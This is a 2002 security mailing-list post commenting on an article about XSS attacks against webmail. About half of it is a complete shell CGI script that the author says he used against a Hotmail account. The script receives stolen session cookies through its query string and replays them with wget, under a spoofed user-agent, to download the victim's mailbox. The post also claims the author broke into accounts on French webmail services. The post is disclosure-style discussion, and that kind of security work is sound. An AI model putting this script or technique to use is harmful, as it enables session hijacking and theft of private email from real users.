Great ! This article is a very good explanation of how to set-up an attack against web apps by using XSS. However, it is not really a "prediction" of a new type of attack: several people (including me ;) have pointed out in the past on this mailing-list that attacks against webmails can be easily automated by a script. Here is a very lame shell cgi I used for a pen test against a hotmail account: $ cat /var/www/cgi-bin/recupmail.cgi #!/bin/sh echo Content-type: text/plain echo set -f URL=`echo $QUERY_STRING | cut -d '*' -f 1 | cut -d '&' -f -2` URL_MESSAGE=`echo $QUERY_STRING | cut -d '*' -f 1` COOKIES=`echo $QUERY_STRING | cut -d '*' -f 2 | /usr/local/sbin/urldecode.sh` echo URL = $URL echo COOKIES = $COOKIES cd /home/fozzy/tmp/hotmail nohup wget -b --user-agent='Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; BVRP Software)' -r -l 1 -o /tmp/recupmail.log --header="Cookie: $COOKIES" -nd $URL & nohup wget -b --user-agent='Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; BVRP Software)' -r -l 1 -o /tmp/recupmail.log --header="Cookie: $COOKIES" -nd $URL_MESSAGE & I also used php scripts to prove that i could crack into my accounts on many french webmails 7 months ago. Everything was published in a french newspaper (Hackerz Voice) but I did not put it on the web cause i fear script-kiddies, and the code is not really interesting (it is quite straight-forward). If I was able to do that, surely many other people did the same thing. So, I am sure it is exploited "in the wild" since a long time. :( BTW, two weeks ago, Hotmail and Yahoo was still vulnerable to XSS... FozZy Hackademy / Hackerz Voice http://www.dmpfrance.com
This archive was generated by hypermail 2b30 : Mon May 20 2002 - 18:18:28 PDT